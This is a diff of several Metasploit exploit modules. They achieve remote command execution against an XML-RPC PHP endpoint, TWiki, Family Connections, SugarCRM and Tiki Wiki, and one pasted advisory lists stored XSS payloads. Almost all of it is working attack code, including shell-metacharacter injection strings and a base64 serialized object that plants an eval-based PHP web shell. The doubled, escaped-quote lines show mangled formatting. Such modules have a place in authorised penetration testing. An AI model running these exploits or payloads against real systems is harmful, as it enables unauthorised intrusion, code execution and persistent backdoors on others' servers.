OptString.new(\'PATH\', [ true, \"Path to xmlrpc.php\", \'/xmlrpc.php\']),
|
||||
OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']),
|
||||
], self.class)
|
||||
|
||||
deregister_options(
|
||||
\'HTTP::junk_params\', # not your typical POST, so don\'t inject params.
|
||||
\'HTTP::junk_slashes\' # For some reason junk_slashes doesn\'t always work, so turn that off for now.
|
||||
'HTTP::junk_params', # not your typical POST, so don't inject params.
|
||||
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
|
||||
)
|
||||
end
|
||||
|
||||
def go(command)
|
||||
|
||||
encoded = command.unpack(\"C*\").collect{|x| \"chr(#{x})\"}.join(\'.\')
|
||||
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
||||
wrapper = rand_text_alphanumeric(rand(128)+32)
|
||||
|
||||
cmd = \"echo(\'#{wrapper}\'); passthru(#{ encoded }); echo(\'#{wrapper}\');;\"
|
||||
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
|
||||
|
||||
xml =
|
||||
\'<?xml version=\"1.0\"?>\' +
|
||||
\"<methodCall>\" +
|
||||
\"<methodName>\"+ rand_text_alphanumeric(rand(128)+32) + \"</methodName>\" +
|
||||
\"<params><param>\" +
|
||||
\"<name>\" + rand_text_alphanumeric(rand(128)+32) + \"\');#{cmd}//</name>\" +
|
||||
\"<value>\" + rand_text_alphanumeric(rand(128)+32) + \"</value>\" +
|
||||
\"</param></params>\" +
|
||||
\"</methodCall>\";
|
||||
'<?xml version="1.0"?>' +
|
||||
"<methodCall>" +
|
||||
"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
|
||||
"<params><param>" +
|
||||
"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
|
||||
"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
|
||||
"</param></params>" +
|
||||
"</methodCall>";
|
||||
|
||||
res = send_request_cgi({
|
||||
\'uri\' => datastore[\'PATH\'],
|
||||
\'method\' => \'POST\',
|
||||
\'ctype\' => \'application/xml\',
|
||||
\'data\' => xml,
|
||||
'uri' => datastore['PATH'],
|
||||
'method' => 'POST',
|
||||
'ctype' => 'application/xml',
|
||||
'data' => xml,
|
||||
}, 5)
|
||||
|
||||
if (res and res.body)
|
||||
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
|
||||
if b
|
||||
return b.captures[0]
|
||||
elsif datastore[\'HTTP::chunked\'] == true
|
||||
elsif datastore['HTTP::chunked'] == true
|
||||
b = /chunked Transfer-Encoding forbidden/.match(res.body)
|
||||
if b
|
||||
raise RuntimeError, \'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.\'
|
||||
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
response = go(\"echo ownable\")
|
||||
response = go("echo ownable")
|
||||
if (!response.nil? and response =~ /ownable/sm)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
@ -110,12 +110,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
response = go(payload.encoded)
|
||||
if response == nil
|
||||
print_error(\'exploit failed: no response\')
|
||||
print_error('exploit failed: no response')
|
||||
else
|
||||
if response.length == 0
|
||||
print_status(\'exploit successful\')
|
||||
print_status('exploit successful')
|
||||
else
|
||||
print_status(\"Command returned #{response}\")
|
||||
print_status("Command returned #{response}")
|
||||
end
|
||||
handler
|
||||
end
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -18,42 +18,42 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'TWiki Search Function Arbitrary Command Execution\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'TWiki Search Function Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the search component of TWiki.
|
||||
By passing a \'search\' parameter containing shell metacharacters to the
|
||||
\'WebSearch\' script, an attacker can execute arbitrary OS commands.
|
||||
By passing a 'search' parameter containing shell metacharacters to the
|
||||
'WebSearch' script, an attacker can execute arbitrary OS commands.
|
||||
},
|
||||
\'Author\' =>
|
||||
'Author' =>
|
||||
[
|
||||
# Unknown - original discovery
|
||||
\'jduck\' # metasploit version
|
||||
'jduck' # metasploit version
|
||||
],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 9671 $\',
|
||||
\'References\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9671 $',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2004-1037\' ],
|
||||
[ \'OSVDB\', \'11714\' ],
|
||||
[ \'BID\', \'11674\' ],
|
||||
[ \'URL\', \'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch\' ]
|
||||
[ 'CVE', '2004-1037' ],
|
||||
[ 'OSVDB', '11714' ],
|
||||
[ 'BID', '11674' ],
|
||||
[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
|
||||
],
|
||||
\'Privileged\' => true, # web server context
|
||||
\'Payload\' =>
|
||||
'Privileged' => true, # web server context
|
||||
'Payload' =>
|
||||
{
|
||||
\'DisableNops\' => true,
|
||||
\'BadChars\' => \' \',
|
||||
\'Space\' => 1024,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => ' ',
|
||||
'Space' => 1024,
|
||||
},
|
||||
\'Platform\' => [ \'unix\' ],
|
||||
\'Arch\' => ARCH_CMD,
|
||||
\'Targets\' => [[ \'Automatic\', { }]],
|
||||
\'DisclosureDate\' => \'Oct 01 2004\',
|
||||
\'DefaultTarget\' => 0))
|
||||
'Platform' => [ 'unix' ],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Oct 01 2004',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new(\'URI\', [ true, \"TWiki bin directory path\", \"/twiki/bin\" ]),
|
||||
OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -61,23 +61,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def check
|
||||
content = rand_text_alphanumeric(16+rand(16))
|
||||
test_file = rand_text_alphanumeric(8+rand(8))
|
||||
cmd_base = datastore[\'URI\'] + \'/view/Main/WebSearch?search=\'
|
||||
test_url = datastore[\'URI\'] + \'/view/Main/\' + test_file
|
||||
cmd_base = datastore['URI'] + '/view/Main/WebSearch?search='
|
||||
test_url = datastore['URI'] + '/view/Main/' + test_file
|
||||
|
||||
# first see if it already exists (it really shouldn\'t)
|
||||
# first see if it already exists (it really shouldn't)
|
||||
res = send_request_raw({
|
||||
\'uri\' => test_url
|
||||
'uri' => test_url
|
||||
}, 25)
|
||||
if (not res) or (res.body.match(content))
|
||||
print_error(\"WARNING: The test file exists already!\")
|
||||
print_error("WARNING: The test file exists already!")
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
# try to create it
|
||||
print_status(\"Attempting to create #{test_url} ...\")
|
||||
search = rand_text_numeric(1+rand(5)) + \"\\\';echo${IFS}\" + content + \"${IFS}>\" + test_file + \".txt;#\\\'\"
|
||||
print_status("Attempting to create #{test_url} ...")
|
||||
search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'"
|
||||
res = send_request_raw({
|
||||
\'uri\' => cmd_base + Rex::Text.uri_encode(search)
|
||||
'uri' => cmd_base + Rex::Text.uri_encode(search)
|
||||
}, 25)
|
||||
if (not res) or (res.code != 200)
|
||||
return Exploit::CheckCode::Safe
|
||||
|
@ -85,20 +85,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# try to run it, 500 code == successfully made it
|
||||
res = send_request_raw({
|
||||
\'uri\' => test_url
|
||||
'uri' => test_url
|
||||
}, 25)
|
||||
if (not res) or (not res.body.match(content))
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
# delete the tmp file
|
||||
print_status(\"Attempting to delete #{test_url} ...\")
|
||||
search = rand_text_numeric(1+rand(5)) + \"\\\';rm${IFS}-f${IFS}\" + test_file + \".txt;#\\\'\"
|
||||
print_status("Attempting to delete #{test_url} ...")
|
||||
search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'"
|
||||
res = send_request_raw({
|
||||
\'uri\' => cmd_base + Rex::Text.uri_encode(search)
|
||||
'uri' => cmd_base + Rex::Text.uri_encode(search)
|
||||
}, 25)
|
||||
if (not res) or (res.code != 200)
|
||||
print_error(\"WARNING: unable to remove test file (#{test_file})\")
|
||||
print_error("WARNING: unable to remove test file (#{test_file})")
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
|
@ -108,21 +108,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
|
||||
search = rand_text_alphanumeric(1+rand(8))
|
||||
search << \"\';\" + payload.encoded + \";#\\\'\"
|
||||
search << "';" + payload.encoded + ";#\'"
|
||||
|
||||
query_str = datastore[\'URI\'] + \'/view/Main/WebSearch\'
|
||||
query_str << \'?search=\'
|
||||
query_str = datastore['URI'] + '/view/Main/WebSearch'
|
||||
query_str << '?search='
|
||||
query_str << Rex::Text.uri_encode(search)
|
||||
|
||||
res = send_request_cgi({
|
||||
\'method\' => \'GET\',
|
||||
\'uri\' => query_str,
|
||||
'method' => 'GET',
|
||||
'uri' => query_str,
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
print_status(\"Successfully sent exploit request\")
|
||||
print_status("Successfully sent exploit request")
|
||||
else
|
||||
raise RuntimeError, \"Error sending exploit request\"
|
||||
raise RuntimeError, "Error sending exploit request"
|
||||
end
|
||||
|
||||
handler
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -14,57 +14,57 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Family Connections less.php Remote Command Execution\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Family Connections less.php Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution vulnerability in
|
||||
Family Connections 2.7.1. It\'s in the dev/less.php script and is due
|
||||
to an insecure use of system(). Authentication isn\'t required to exploit
|
||||
Family Connections 2.7.1. It's in the dev/less.php script and is due
|
||||
to an insecure use of system(). Authentication isn't required to exploit
|
||||
the vulnerability but register_globals must be set to On.
|
||||
},
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Author\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
\'mr_me <steventhomasseeley[at]gmail.com>\', # Vulnerability discovery and exploit
|
||||
\'juan vazquez\' # Metasploit module
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # Vulnerability discovery and exploit
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
\'References\' =>
|
||||
'References' =>
|
||||
[
|
||||
[ \'URL\', \'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/\' ],
|
||||
[ \'URL\', \'http://sourceforge.net/apps/trac/fam-connections/ticket/407\' ],
|
||||
[ \'URL\', \'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html\' ],
|
||||
[ \'URL\', \'http://www.exploit-db.com/exploits/18198/\' ]
|
||||
[ 'URL', 'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/' ],
|
||||
[ 'URL', 'http://sourceforge.net/apps/trac/fam-connections/ticket/407' ],
|
||||
[ 'URL', 'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/18198/' ]
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'Payload\' =>
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
\'Compat\' =>
|
||||
'Compat' =>
|
||||
{
|
||||
\'PayloadType\' => \'cmd\',
|
||||
\'RequiredCmd\' => \'generic telnet perl ruby\',
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic telnet perl ruby',
|
||||
}
|
||||
},
|
||||
\'Platform\' => [\'unix\', \'linux\'],
|
||||
\'Arch\' => ARCH_CMD,
|
||||
\'Targets\' => [[\'Automatic\',{}]],
|
||||
\'DisclosureDate\' => \'Nov 29 2011\',
|
||||
\'DefaultTarget\' => 0
|
||||
'Platform' => ['unix', 'linux'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [['Automatic',{}]],
|
||||
'DisclosureDate' => 'Nov 29 2011',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new(\'URI\', [true, \"The path to the Family Connections main site\", \"/fcms/\"]),
|
||||
OptString.new('URI', [true, "The path to the Family Connections main site", "/fcms/"]),
|
||||
],self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
uri = datastore[\'URI\']
|
||||
uri += (datastore[\'URI\'][-1, 1] == \"/\") ? \"dev/less.php\" : \"/dev/less.php\"
|
||||
uri = datastore['URI']
|
||||
uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
|
||||
|
||||
mark = Rex::Text.rand_text_alpha(rand(5) + 5)
|
||||
|
||||
res = send_request_cgi({
|
||||
\'uri\' => uri,
|
||||
\'vars_get\' => { \'argv[1]\' => \"|echo #{mark};#\" }
|
||||
'uri' => uri,
|
||||
'vars_get' => { 'argv[1]' => "|echo #{mark};#" }
|
||||
}, 25)
|
||||
|
||||
if res and res.code == 200 and res.body =~ /#{mark}/
|
||||
|
@ -75,23 +75,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
uri = datastore[\'URI\']
|
||||
uri += (datastore[\'URI\'][-1, 1] == \"/\") ? \"dev/less.php\" : \"/dev/less.php\"
|
||||
uri = datastore['URI']
|
||||
uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
|
||||
|
||||
start_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
|
||||
end_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
|
||||
custom_payload = \"|echo #{start_mark};#{payload.encoded};echo #{end_mark};#\"
|
||||
custom_payload = "|echo #{start_mark};#{payload.encoded};echo #{end_mark};#"
|
||||
|
||||
res = send_request_cgi({
|
||||
\'uri\' => uri,
|
||||
\'vars_get\' => { \'argv[1]\' => custom_payload }
|
||||
'uri' => uri,
|
||||
'vars_get' => { 'argv[1]' => custom_payload }
|
||||
}, 25)
|
||||
|
||||
if res and res.code == 200 and res.body =~ /#{start_mark}/
|
||||
# Prints output when using cmd/unix/generic
|
||||
result = res.body.split(/#{start_mark}/)[1].split(/#{end_mark}/)[0]
|
||||
if not result.strip.empty?
|
||||
print_status(\"Result of the command:\\n#{result}\")
|
||||
print_status("Result of the command:\n#{result}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -21,29 +21,29 @@ Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Co
|
|||
|
||||
page : messageboard.php?thread=1
|
||||
|
||||
decription: if you ADD javascript code in \" reply \" field , the code will execute in \" profile.php?member=1 \" page.
|
||||
decription: if you ADD javascript code in " reply " field , the code will execute in " profile.php?member=1 " page.
|
||||
|
||||
|
||||
page : familynews.php?addnews=yes
|
||||
|
||||
description : when you add news you can put js in \" text area \" field to execute
|
||||
description : when you add news you can put js in " text area " field to execute
|
||||
|
||||
|
||||
page : prayers.php
|
||||
|
||||
description : when you add prayer ,you can inject js in \"pray for\" field as \"<script>alert(/xss/)</script>\"
|
||||
description : when you add prayer ,you can inject js in "pray for" field as "<script>alert(/xss/)</script>"
|
||||
|
||||
|
||||
page : recipes.php?add=category
|
||||
|
||||
description : insert in \"name\" field \"><script>alert(/xss/)</script> , it will execute at \"recipes.php?addrecipe=yes\" page
|
||||
description : insert in "name" field "><script>alert(/xss/)</script> , it will execute at "recipes.php?addrecipe=yes" page
|
||||
|
||||
|
||||
page : calendar.php?add=2011-12-2
|
||||
|
||||
description : when add an event, insert in \"Event\" field (\"<script>alert(/xss/)</script>\")
|
||||
description : when add an event, insert in "Event" field ("<script>alert(/xss/)</script>")
|
||||
|
||||
it will execute at \"calendar.php\" page
|
||||
it will execute at "calendar.php" page
|
||||
|
||||
################################Reflected XSS#################################################################################
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -14,141 +14,141 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'SugarCRM <= 6.3.1 unserialize() PHP Code Execution\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'SugarCRM <= 6.3.1 unserialize() PHP Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a php unserialize() vulnerability in SugarCRM <= 6.3.1
|
||||
which could be abused to allow authenticated SugarCRM users to execute arbitrary
|
||||
code with the permissions of the webserver.
|
||||
|
||||
The dangerous unserialize() exists in the \'include/MVC/View/views/view.list.php\'
|
||||
script, which is called with user controlled data from the \'current_query_by_page\'
|
||||
The dangerous unserialize() exists in the 'include/MVC/View/views/view.list.php'
|
||||
script, which is called with user controlled data from the 'current_query_by_page'
|
||||
parameter. The exploit abuses the __destruct() method from the SugarTheme class
|
||||
to write arbitrary PHP code to a \'pathCache.php\' on the web root.
|
||||
to write arbitrary PHP code to a 'pathCache.php' on the web root.
|
||||
},
|
||||
\'Author\' =>
|
||||
'Author' =>
|
||||
[
|
||||
\'EgiX\', # Vulnerability discovery and PoC
|
||||
\'juan vazquez\', # Metasploit module
|
||||
\'sinn3r\' # Metasploit module
|
||||
'EgiX', # Vulnerability discovery and PoC
|
||||
'juan vazquez', # Metasploit module
|
||||
'sinn3r' # Metasploit module
|
||||
],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision$\',
|
||||
\'References\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2012-0694\' ],
|
||||
[ \'EDB\', \'19381\' ],
|
||||
[ \'URL\', \'http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/\' ]
|
||||
[ 'CVE', '2012-0694' ],
|
||||
[ 'EDB', '19381' ],
|
||||
[ 'URL', 'http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/' ]
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'Platform\' => [\'php\'],
|
||||
\'Arch\' => ARCH_PHP,
|
||||
\'Payload\' =>
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Payload' =>
|
||||
{
|
||||
\'DisableNops\' => true,
|
||||
'DisableNops' => true,
|
||||
},
|
||||
\'Targets\' => [ [\'Automatic\', { }], ],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Jun 23 2012\'
|
||||
'Targets' => [ ['Automatic', { }], ],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 23 2012'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new(\'TARGETURI\', [ true, \"The base path to the web application\", \"/sugarcrm/\"]),
|
||||
OptString.new(\'USERNAME\', [true, \"The username to authenticate with\" ]),
|
||||
OptString.new(\'PASSWORD\', [true, \"The password to authenticate with\" ])
|
||||
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"]),
|
||||
OptString.new('USERNAME', [true, "The username to authenticate with" ]),
|
||||
OptString.new('PASSWORD', [true, "The password to authenticate with" ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type == \"meterpreter\"
|
||||
f = \"pathCache.php\"
|
||||
client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")
|
||||
if client.type == "meterpreter"
|
||||
f = "pathCache.php"
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
begin
|
||||
client.fs.file.rm(f)
|
||||
print_good(\"#{@peer} - #{f} removed to stay ninja\")
|
||||
print_good("#{@peer} - #{f} removed to stay ninja")
|
||||
rescue
|
||||
print_error(\"#{@peer} - Unable to remove #{f}\")
|
||||
print_error("#{@peer} - Unable to remove #{f}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
base = target_uri.path
|
||||
base << \'/\' if base[-1, 1] != \'/\'
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
@peer = \"#{rhost}:#{rport}\"
|
||||
username = datastore[\'USERNAME\']
|
||||
password = datastore[\'PASSWORD\']
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
username = datastore['USERNAME']
|
||||
password = datastore['PASSWORD']
|
||||
|
||||
# Can\'t use vars_post because it\'ll escape \"_\"
|
||||
data = \"module=Users&\"
|
||||
data << \"action=Authenticate&\"
|
||||
data << \"user_name=#{username}&\"
|
||||
data << \"user_password=#{password}\"
|
||||
# Can't use vars_post because it'll escape "_"
|
||||
data = "module=Users&"
|
||||
data << "action=Authenticate&"
|
||||
data << "user_name=#{username}&"
|
||||
data << "user_password=#{password}"
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'uri\' => \"#{base}index.php\" ,
|
||||
\'method\' => \"POST\",
|
||||
\'headers\' =>
|
||||
'uri' => "#{base}index.php" ,
|
||||
'method' => "POST",
|
||||
'headers' =>
|
||||
{
|
||||
\'Cookie\' => \"PHPSESSID=1\",
|
||||
'Cookie' => "PHPSESSID=1",
|
||||
},
|
||||
\'data\' => data
|
||||
'data' => data
|
||||
})
|
||||
|
||||
if not res or res.headers[\'Location\'] =~ /action=Login/ or not res.headers[\'Set-Cookie\']
|
||||
print_error(\"#{@peer} - Login failed with \\\"#{username}:#{password}\\\"\")
|
||||
if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
|
||||
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
|
||||
return
|
||||
end
|
||||
|
||||
if res.headers[\'Set-Cookie\'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
|
||||
if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
|
||||
session_id = $1
|
||||
else
|
||||
print_error(\"#{@peer} - Login failed with \\\"#{username}:#{password}\\\" (No session ID)\")
|
||||
print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
|
||||
return
|
||||
end
|
||||
|
||||
print_status(\"#{@peer} - Login successful with #{username}:#{password}\")
|
||||
print_status("#{@peer} - Login successful with #{username}:#{password}")
|
||||
|
||||
data = \"module=Contacts&\"
|
||||
data << \"Contacts2_CONTACT_offset=1&\"
|
||||
data << \"current_query_by_page=\"
|
||||
#O:10:\"SugarTheme\":2:{s:10:\"*dirName\";s:5:\"../..\";s:20:\"SugarTheme_jsCache\";s:49:\"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>\";}
|
||||
data << \"TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30=\"
|
||||
data = "module=Contacts&"
|
||||
data << "Contacts2_CONTACT_offset=1&"
|
||||
data << "current_query_by_page="
|
||||
#O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";}
|
||||
data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
|
||||
|
||||
print_status(\"#{@peer} - Exploiting the unserialize()\")
|
||||
print_status("#{@peer} - Exploiting the unserialize()")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'uri\' => \"#{base}index.php\",
|
||||
\'method\' => \'POST\',
|
||||
\'headers\' =>
|
||||
'uri' => "#{base}index.php",
|
||||
'method' => 'POST',
|
||||
'headers' =>
|
||||
{
|
||||
\'Cookie\' => \"PHPSESSID=#{session_id};\",
|
||||
'Cookie' => "PHPSESSID=#{session_id};",
|
||||
},
|
||||
\'data\' => data
|
||||
'data' => data
|
||||
})
|
||||
|
||||
if not res or res.code != 200
|
||||
print_error(\"#{@peer} - Exploit failed: #{res.code}\")
|
||||
print_error("#{@peer} - Exploit failed: #{res.code}")
|
||||
return
|
||||
end
|
||||
|
||||
print_status(\"#{@peer} - Executing the payload\")
|
||||
print_status("#{@peer} - Executing the payload")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'method\' => \'GET\',
|
||||
\'uri\' => \"#{base}pathCache.php\",
|
||||
\'headers\' => {
|
||||
\'Cmd\' => Rex::Text.encode_base64(payload.encoded)
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}pathCache.php",
|
||||
'headers' => {
|
||||
'Cmd' => Rex::Text.encode_base64(payload.encoded)
|
||||
}
|
||||
})
|
||||
|
||||
if res
|
||||
print_error(\"#{@peer} - Payload execution failed: #{res.code}\")
|
||||
print_error("#{@peer} - Payload execution failed: #{res.code}")
|
||||
return
|
||||
end
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -14,14 +14,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Tiki Wiki <= 8.3 unserialize() PHP Code Execution\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Tiki Wiki <= 8.3 unserialize() PHP Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3
|
||||
which could be abused to allow unauthenticated users to execute arbitrary code
|
||||
under the context of the webserver user.
|
||||
|
||||
The dangerous unserialize() exists in the \'tiki-print_multi_pages.php\' script,
|
||||
which is called with user controlled data from the \'printpages\' parameter.
|
||||
The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script,
|
||||
which is called with user controlled data from the 'printpages' parameter.
|
||||
The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy
|
||||
class to write arbitrary PHP code to a file on the Tiki Wiki web directory.
|
||||
|
||||
|
@ -31,111 +31,111 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
version older than 5.3.4 must be used to allow poison null bytes in filesystem related
|
||||
functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.
|
||||
},
|
||||
\'Author\' =>
|
||||
'Author' =>
|
||||
[
|
||||
\'EgiX\', # Vulnerability discovery and PoC
|
||||
\'juan vazquez\' # Metasploit module
|
||||
'EgiX', # Vulnerability discovery and PoC
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision$\',
|
||||
\'References\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2012-0911\' ],
|
||||
[ \'BID\', \'54298\' ],
|
||||
[ \'EDB\', \'19573\' ],
|
||||
[ \'URL\', \'http://dev.tiki.org/item4109\' ]
|
||||
[ 'CVE', '2012-0911' ],
|
||||
[ 'BID', '54298' ],
|
||||
[ 'EDB', '19573' ],
|
||||
[ 'URL', 'http://dev.tiki.org/item4109' ]
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'Platform\' => [\'php\'],
|
||||
\'Arch\' => ARCH_PHP,
|
||||
\'Payload\' =>
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Payload' =>
|
||||
{
|
||||
\'DisableNops\' => true,
